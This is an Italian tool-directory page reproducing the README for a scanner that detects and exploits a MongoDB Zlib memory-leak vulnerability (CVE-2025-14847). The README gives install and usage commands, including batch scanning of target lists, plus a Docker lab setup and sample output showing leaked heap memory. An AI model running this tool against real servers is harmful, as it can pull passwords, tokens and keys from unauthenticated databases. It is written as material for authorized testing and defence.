Skip to content
KitploitKITPLOIT
StrumentiBlog
Log in
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-14847 — Strumento di rilevamento della vulnerabilità di perdita di memoria di MongoDB (CVE-2025-14847) | Kitploit
Strumenti/GitHubGitHub/onewinner/cve-2025-14847
Scanner di VulnerabilitàMemory ForensicsExploitRaccolta InformazioniPenetration TestingSicurezza dei Database
GitHubonewinner/cve-2025-14847

CVE-2025-14847

Strumento di rilevamento della vulnerabilità di perdita di memoria di MongoDB (CVE-2025-14847)

Vedi Repository
142169 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Strumento di rilevamento della vulnerabilità MongoDB CVE-2025-14847

Strumento di rilevamento della vulnerabilità di perdita di memoria di MongoDB (CVE-2025-14847)


⚠️ Nota importante: questo strumento è destinato esclusivamente a test di sicurezza autorizzati e valutazione delle vulnerabilità. L'uso non autorizzato può violare la legge.


📋 Indice

  • Descrizione della vulnerabilità
  • Caratteristiche
  • Installazione
  • Utilizzo
  • Configurazione dell'ambiente di test
  • Esempi di output
  • Principio di rilevamento
  • Raccomandazioni di correzione
  • Disclaimer

🔍 Descrizione della vulnerabilità

CVE-2025-14847 è una grave vulnerabilità di perdita di memoria nella gestione del protocollo di compressione Zlib di MongoDB. Un attaccante può inviare pacchetti compressi appositamente costruiti, facendo sì che MongoDB restituisca dati di memoria heap non inizializzati, che possono contenere informazioni sensibili.

Versioni interessate

Intervallo di versioniStato
8.2.0 - 8.2.2⚠️ Vulnerabile
8.0.0 - 8.0.16⚠️ Vulnerabile
7.0.0 - 7.0.27⚠️ Vulnerabile
6.0.0 - 6.0.26⚠️ Vulnerabile
5.0.0 - 5.0.31⚠️ Vulnerabile
4.4.0 - 4.4.29⚠️ Vulnerabile
4.2.x tutte le versioni⚠️ Vulnerabile
4.0.x tutte le versioni⚠️ Vulnerabile
3.6.x tutte le versioni⚠️ Vulnerabile

Impatto della vulnerabilità

  • 🔴 Gravità: CVSS 8.7 (alta)
  • 💾 Perdita di memoria heap con dati sensibili
  • 🔑 Può contenere password, token di sessione, chiavi crittografiche, ecc.
  • 🚫 Sfruttabile senza autenticazione
  • 🌐 Sfruttabile da remoto

✨ Caratteristiche

  • ✅ Rilevamento intelligente - identifica automaticamente la versione di MongoDB e determina se è vulnerabile
  • ✅ Doppia verifica - rilevamento versione → verifica supporto Zlib → estrazione perdita di memoria
  • ✅ Scansione singolo target - rileva rapidamente una singola istanza MongoDB
  • ✅ Scansione batch - legge l'elenco dei target da un file per il rilevamento di massa
  • ✅ Scansione concorrente - supporta l'esecuzione concorrente multi-thread per aumentare l'efficienza
  • ✅ Output in tempo reale - visualizza in tempo reale i dati di memoria divulgati
  • ✅ Esportazione dei risultati - salva automaticamente su file i target vulnerabili
  • ✅ Output conciso - formato di output uniforme e chiaro

🚀 Installazione

Metodo 1: Compilazione dal sorgente

# Clona il repository
git clone https://github.com/onewinner/CVE-2025-14847.git
cd CVE-2025-14847

# Installa le dipendenze
go mod download

# Compila
go build -o mongodb-scanner main.go

# Esegui
./mongodb-scanner -t 127.0.0.1:27017

Metodo 2: Esecuzione diretta

go run main.go -t 127.0.0.1:27017

Metodo 3: Scarica la versione precompilata

Visita la pagina Releases per scaricare la versione precompilata adatta al tuo sistema.

📖 Utilizzo

Utilizzo di base

# Scansione di un singolo target
./mongodb-scanner -t 127.0.0.1:27017

# Scansione batch da file
./mongodb-scanner -f targets.txt

# Scansione batch (20 thread)
./mongodb-scanner -f targets.txt -c 20

# Scansione e salvataggio dei target vulnerabili
./mongodb-scanner -f targets.txt -o vulnerable.txt

# Intervallo di offset personalizzato (scansione più rapida o più profonda)
./mongodb-scanner -t 127.0.0.1:27017 --min-offset 20 --max-offset 1000

Parametri della riga di comando

ParametroDescrizioneValore predefinito
-t <target>Singolo target (es: 127.0.0.1:27017)-
-f <file>File dei target (un target per riga)-
-c <num>Numero di thread concorrenti10
-timeout <time>Timeout di connessione2s
-o <file>File di output (salva i target vulnerabili)-
--min-offset <num>Offset minimo della lunghezza del documento20
--max-offset <num>Offset massimo della lunghezza del documento8192

Formato del file dei target

Crea un file targets.txt:

# Elenco dei target MongoDB
127.0.0.1:27017
192.168.1.100:27017
mongodb.example.com:27017

# Se non si specifica la porta, viene utilizzata la 27017 predefinita
192.168.1.101

🐳 Configurazione dell'ambiente di test

Per testare questo strumento in sicurezza, si consiglia di utilizzare Docker per configurare un ambiente di test locale.

Avvio rapido di MongoDB vulnerabile

# Avvia MongoDB 6.0.14 (versione vulnerabile) con compressione Zlib abilitata
docker run -d \
  --name mongodb-vulnerable \
  -p 27017:27017 \
  mongo:6.0.14 \
  --networkMessageCompressors snappy,zlib

# Controlla lo stato del container
docker ps

# Test della vulnerabilità
./mongodb-scanner -t 127.0.0.1:27017

Utilizzo di Docker Compose

Crea un file docker-compose.yml:

version: '3.8'

services:
  # Versione vulnerabile (con Zlib abilitato)
  mongodb-vulnerable:
    image: mongo:6.0.14
    container_name: mongodb-vulnerable
    ports:
      - "27017:27017"
    command: mongod --networkMessageCompressors snappy,zlib

  # Versione corretta (per test comparativi)
  mongodb-patched:
    image: mongo:6.0.27
    container_name: mongodb-patched
    ports:
      - "27018:27017"
    command: mongod --networkMessageCompressors snappy,zlib

volumes:
  mongodb-data:
  mongodb-patched-data:

Avvia l'ambiente di test:

# Avvia tutti i container
docker-compose up -d

# Test della versione vulnerabile
./mongodb-scanner -t 127.0.0.1:27017

# Test della versione corretta
./mongodb-scanner -t 127.0.0.1:27018

# Arresta e pulisci
docker-compose down -v

Pulizia dell'ambiente di test

# Arresta ed elimina i container
docker stop mongodb-vulnerable && docker rm mongodb-vulnerable

# Pulisci i volumi dati
docker volume prune -f

📊 Esempi di output

Spiegazione del formato di output

Lo strumento utilizza prefissi uniformi per contrassegnare le informazioni di output:

  • [*] - Output informativo (target, versione, configurazione, ecc.)
  • [+] - Successo / vulnerabile / dati estratti
  • [-] - Errore / sicuro / nessuna vulnerabilità
  • [!] - Avviso / nota importante

Scansione singolo target - Vulnerabile

╔══════════════════════════════════════════════════════════════╗
║  MongoDB CVE-2025-14847 漏洞检测工具                         ║
╚══════════════════════════════════════════════════════════════╝
⚠️  仅用于授权安全测试 | 未经授权测试可能违法

[*] 目标: 1 | 线程: 10 | 超时: 2s | 偏移: 20-1000
[*] 开始扫描...

[*] 目标: 127.0.0.1:27017
[*] 版本: 6.0.14
[+] 漏洞版本: 是
[+] Zlib压缩: 已开启
[!] 漏洞可利用,开始提取内存...
[+] 偏移=229 长度=250: :00\"},\"s\":\"I\",  \"c\":\"NETWORK\",  \"id\":22944,   \"ctx\":\"conn102932\",

[+] 127.0.0.1:27017 - 漏洞可利用 (v6.0.14) - 3468ms
[+] 成功提取 1 项内存数据:
    [1] :00\"},\"s\":\"I\",  \"c\":\"NETWORK\",  \"id\":22944,   \"ctx\":\"conn102932\",\"msg\":\"Connection ended\",\"attr\":{\"remote\":\"172.17.0.1:44936\"...

======================================================================
[*] 扫描完成 | 总数: 1 | 可利用: 1 | 安全: 0 | 耗时: 3.4s
======================================================================

Scansione singolo target - Versione sicura

[*] 目标: 127.0.0.1:27018
[*] 版本: 6.0.27
[-] 漏洞版本: 否

[-] 127.0.0.1:27018 - 版本安全 (v6.0.27) - 156ms

======================================================================
[*] 扫描完成 | 总数: 1 | 可利用: 0 | 安全: 1 | 耗时: 0.2s
======================================================================

Scansione singolo target - Zlib non abilitato

[*] 目标: 127.0.0.1:27017
[*] 版本: 6.0.14
[+] 漏洞版本: 是
[-] Zlib压缩: 未开启

[-] 127.0.0.1:27017 - 未开启Zlib (v6.0.14) - 234ms

======================================================================
[*] 扫描完成 | 总数: 1 | 可利用: 0 | 安全: 1 | 耗时: 0.3s
======================================================================

Scansione batch

Scarica lo strumento